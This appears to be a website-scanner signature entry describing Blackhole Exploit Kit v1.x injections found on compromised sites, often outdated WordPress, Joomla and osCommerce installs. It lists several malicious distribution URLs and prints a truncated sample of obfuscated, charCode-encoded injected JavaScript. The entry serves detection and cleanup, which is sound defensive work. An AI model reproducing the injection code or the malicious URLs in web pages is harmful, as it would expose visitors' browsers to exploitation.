SiteCheck Signatures


malware-entry-mwexploitkitblackhole1

Description:

Encoded JavaScript (or a redirection to it) was detected that leads browsers to the Blackhole Exploit Kit (v1.x). The kit attempts to exploit the browser of anyone visiting the site using a combination of multiple vulnerabilities (Java, Adobe PDF, Flash and others). This is one of the most common types of malware we are seeing on web sites lately (2012/Mar).

Note that any PHP, JS or .htaccess file could be compromised by this type of malware.

 
Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.

Clean up: You can also sign up with us and let our team remove the malware for you.

 
Loads malware from multiple sources:


http://studbax.ru/main.php?page=c22541c393fa212e
http://wgykabjnh.usa.cc/d/404.php?go=1
http://szukxxpf.igg.biz/main.php?page=c69bd02e93e6957c
http://itunesg.ibiz.cc/?go=2
(and many other domains).

 
Malware dump (sample of malware):

<b>@@@ 9D8JB :CIYLG>I:S"g8:CI:Gig= i{A:6H: L6>I E6<: >H AD69>C<YYYgZ=igZ8:CI:Gig=G..

<script<i=0;try{prototype;}catch(z){h="h"+"arCode ";f=["-32c-32c64c61c-9c-1c59c70c58c76c68c60c69..